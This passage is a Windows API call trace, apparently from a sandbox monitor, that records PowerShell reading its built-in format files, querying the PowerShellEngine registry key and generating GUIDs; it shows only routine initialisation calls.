	[0769.374] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.374] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.375] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.375] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.375] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.376] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.376] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.377] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.377] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.377] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.378] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.378] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.378] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.379] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.379] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.379] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.380] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.380] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.381] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.381] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.381] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.382] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.382] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.382] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0xf37, lpOverlapped=0x0) returned 1
	[0769.383] ReadFile (in: hFile=0x310, lpBuffer=0x32281ff, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x32281ff*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0769.383] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0769.383] CloseHandle (hObject=0x310) returned 1
	[0769.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0769.383] SetErrorMode (uMode=0x1) returned 0x1
	[0769.383] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d0e0 | out: lpFileInformation=0x20d0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0769.383] SetErrorMode (uMode=0x1) returned 0x1
	[0769.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0769.384] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1c8 | out: phkResult=0x20d1c8*=0x310) returned 0x0
	[0769.384] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d14c, lpData=0x0, lpcbData=0x20d148*=0x0 | out: lpType=0x20d14c*=0x1, lpData=0x0, lpcbData=0x20d148*=0x56) returned 0x0
	[0769.384] CoTaskMemAlloc (cb=0x5a) returned 0x1b8560b0
	[0769.384] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d11c, lpData=0x1b8560b0, lpcbData=0x20d118*=0x56 | out: lpType=0x20d11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d118*=0x56) returned 0x0
	[0769.384] CoTaskMemFree (pv=0x1b8560b0) 
	[0769.384] RegCloseKey (hKey=0x310) returned 0x0
	[0769.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0769.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0769.389] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xb0f27b20, Data2=0x9e, Data3=0x4549, Data4=([0]=0xaa, [1]=0x87, [2]=0x75, [3]=0x9d, [4]=0x34, [5]=0xd3, [6]=0x38, [7]=0x60))) returned 0x0
	[0769.389] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xf2347c3e, Data2=0x6408, Data3=0x4368, Data4=([0]=0x94, [1]=0xb9, [2]=0xa9, [3]=0xbd, [4]=0x64, [5]=0xe5, [6]=0x81, [7]=0x8f))) returned 0x0
	[0770.111] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x494aaf6b, Data2=0x2425, Data3=0x4b10, Data4=([0]=0xb5, [1]=0xe, [2]=0x9b, [3]=0x6b, [4]=0x77, [5]=0xc4, [6]=0xce, [7]=0x78))) returned 0x0
	[0770.112] VirtualQuery (in: lpAddress=0x20b400, lpBuffer=0x20c2c0, dwLength=0x30 | out: lpBuffer=0x20c2c0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0770.113] VirtualQuery (in: lpAddress=0x20b490, lpBuffer=0x20c350, dwLength=0x30 | out: lpBuffer=0x20c350*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0770.675] VirtualQuery (in: lpAddress=0x20bc00, lpBuffer=0x20cac0, dwLength=0x30 | out: lpBuffer=0x20cac0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0770.676] VirtualQuery (in: lpAddress=0x20bb70, lpBuffer=0x20ca30, dwLength=0x30 | out: lpBuffer=0x20ca30*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0770.677] VirtualQuery (in: lpAddress=0x20bc00, lpBuffer=0x20cac0, dwLength=0x30 | out: lpBuffer=0x20cac0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0770.678] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x7ef25b85, Data2=0x3c08, Data3=0x4ac6, Data4=([0]=0xb2, [1]=0x70, [2]=0xfc, [3]=0x3a, [4]=0xa3, [5]=0x12, [6]=0x3f, [7]=0x39))) returned 0x0
	[0770.679] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xcc714516, Data2=0x1ecc, Data3=0x49d1, Data4=([0]=0xa9, [1]=0x67, [2]=0x4f, [3]=0x9f, [4]=0xd0, [5]=0xad, [6]=0xea, [7]=0x77))) returned 0x0
	[0770.680] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x5f6d8a29, Data2=0xadab, Data3=0x4a45, Data4=([0]=0xb0, [1]=0x68, [2]=0xf7, [3]=0x89, [4]=0xd6, [5]=0x21, [6]=0xad, [7]=0x28))) returned 0x0
	[0770.682] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xb4a28823, Data2=0xb732, Data3=0x4348, Data4=([0]=0x9e, [1]=0x3e, [2]=0x70, [3]=0xf8, [4]=0x79, [5]=0xde, [6]=0x5, [7]=0x9b))) returned 0x0
	[0770.683] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xea748bf6, Data2=0xe1e6, Data3=0x4658, Data4=([0]=0xbe, [1]=0x7d, [2]=0xe8, [3]=0xcf, [4]=0x15, [5]=0xb2, [6]=0xf9, [7]=0x79))) returned 0x0
	[0770.683] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x38074826, Data2=0xa5af, Data3=0x40fe, Data4=([0]=0xa4, [1]=0xb, [2]=0xdc, [3]=0x41, [4]=0x35, [5]=0x93, [6]=0x90, [7]=0xae))) returned 0x0
	[0770.683] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xb05584a7, Data2=0x15dd, Data3=0x4549, Data4=([0]=0x96, [1]=0x4e, [2]=0xd2, [3]=0xf3, [4]=0x94, [5]=0x6d, [6]=0xf3, [7]=0x80))) returned 0x0
	[0770.684] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xe24960ce, Data2=0x1d12, Data3=0x4491, Data4=([0]=0x9e, [1]=0xe7, [2]=0xee, [3]=0xa7, [4]=0x6e, [5]=0x35, [6]=0x7a, [7]=0xe4))) returned 0x0
	[0770.685] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x50da9b80, Data2=0xda8b, Data3=0x4c32, Data4=([0]=0xbe, [1]=0x38, [2]=0x2e, [3]=0xe4, [4]=0x16, [5]=0xe0, [6]=0xca, [7]=0x1a))) returned 0x0
	[0770.685] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x7a2356ae, Data2=0xf5e9, Data3=0x4833, Data4=([0]=0x81, [1]=0x40, [2]=0x7, [3]=0x94, [4]=0x42, [5]=0xfc, [6]=0xf8, [7]=0xd4))) returned 0x0
	[0770.685] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xbe8c6be1, Data2=0x27c0, Data3=0x4421, Data4=([0]=0xac, [1]=0x9c, [2]=0x7, [3]=0x75, [4]=0x62, [5]=0x5c, [6]=0x9c, [7]=0x88))) returned 0x0
	[0770.686] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xa323ccde, Data2=0x2605, Data3=0x45fb, Data4=([0]=0x86, [1]=0x96, [2]=0x53, [3]=0x6f, [4]=0xb8, [5]=0x17, [6]=0x66, [7]=0xb8))) returned 0x0
	[0770.688] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x79cf26d3, Data2=0x697d, Data3=0x49bd, Data4=([0]=0x93, [1]=0xfc, [2]=0xa1, [3]=0x53, [4]=0xfc, [5]=0x34, [6]=0xe6, [7]=0x9))) returned 0x0
	[0770.689] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xaf698948, Data2=0xcc1a, Data3=0x4be1, Data4=([0]=0xb5, [1]=0x8, [2]=0xcf, [3]=0x52, [4]=0x59, [5]=0x42, [6]=0x87, [7]=0x15))) returned 0x0
	[0770.690] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x807983eb, Data2=0x1d26, Data3=0x47c6, Data4=([0]=0xb2, [1]=0x7c, [2]=0x8f, [3]=0x0, [4]=0x3c, [5]=0x4e, [6]=0x2f, [7]=0xc9))) returned 0x0
	[0770.690] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x42a1f08d, Data2=0x3ef9, Data3=0x426a, Data4=([0]=0x83, [1]=0x40, [2]=0x6d, [3]=0xde, [4]=0x16, [5]=0x45, [6]=0x15, [7]=0x6d))) returned 0x0
	[0770.691] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xa5f1900a, Data2=0x1586, Data3=0x4f7e, Data4=([0]=0x85, [1]=0xf4, [2]=0x4b, [3]=0x28, [4]=0x40, [5]=0x32, [6]=0x16, [7]=0x94))) returned 0x0
	[0770.691] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xa34e86a, Data2=0x295d, Data3=0x4cdb, Data4=([0]=0x93, [1]=0xba, [2]=0x34, [3]=0x6f, [4]=0xf, [5]=0xf8, [6]=0x1a, [7]=0x67))) returned 0x0
	[0770.691] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x61b42e2b, Data2=0xb59a, Data3=0x4fdc, Data4=([0]=0x8a, [1]=0x62, [2]=0xe1, [3]=0xef, [4]=0x5b, [5]=0xb3, [6]=0xad, [7]=0xf2))) returned 0x0
	[0770.692] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x333e6bd2, Data2=0x97cc, Data3=0x457d, Data4=([0]=0x8e, [1]=0xf0, [2]=0xad, [3]=0x23, [4]=0x57, [5]=0xd9, [6]=0x50, [7]=0xf8))) returned 0x0
	[0770.692] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xd792958c, Data2=0xbdd7, Data3=0x4d89, Data4=([0]=0xac, [1]=0x42, [2]=0xd3, [3]=0x2, [4]=0x41, [5]=0xc8, [6]=0xd2, [7]=0xe2))) returned 0x0
	[0770.692] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x30bf3963, Data2=0xdba5, Data3=0x477b, Data4=([0]=0xad, [1]=0x82, [2]=0xd6, [3]=0x6e, [4]=0xe2, [5]=0x3d, [6]=0x83, [7]=0xde))) returned 0x0
	[0770.692] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0770.693] GetFileType (hFile=0x310) returned 0x1
	[0770.693] SetErrorMode (uMode=0x1) returned 0x1
	[0770.693] GetFileType (hFile=0x310) returned 0x1
	[0770.693] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.693] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.693] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.694] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.694] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.694] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.694] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.694] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.695] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.696] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.696] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.696] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.697] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.697] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.697] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.697] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.698] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.698] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.699] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.699] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.699] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0770.700] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0xe67, lpOverlapped=0x0) returned 1
	[0770.700] ReadFile (in: hFile=0x310, lpBuffer=0x30822bf, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x30822bf*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0770.700] ReadFile (in: hFile=0x310, lpBuffer=0x3082cf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3082cf0*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0770.700] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1c8 | out: phkResult=0x20d1c8*=0x310) returned 0x0
	[0770.701] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d14c, lpData=0x0, lpcbData=0x20d148*=0x0 | out: lpType=0x20d14c*=0x1, lpData=0x0, lpcbData=0x20d148*=0x56) returned 0x0
	[0770.701] CoTaskMemAlloc (cb=0x5a) returned 0x1b8560b0
	[0770.701] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d11c, lpData=0x1b8560b0, lpcbData=0x20d118*=0x56 | out: lpType=0x20d11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d118*=0x56) returned 0x0
	[0770.701] CoTaskMemFree (pv=0x1b8560b0) 
	[0770.701] RegCloseKey (hKey=0x310) returned 0x0
	[0770.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
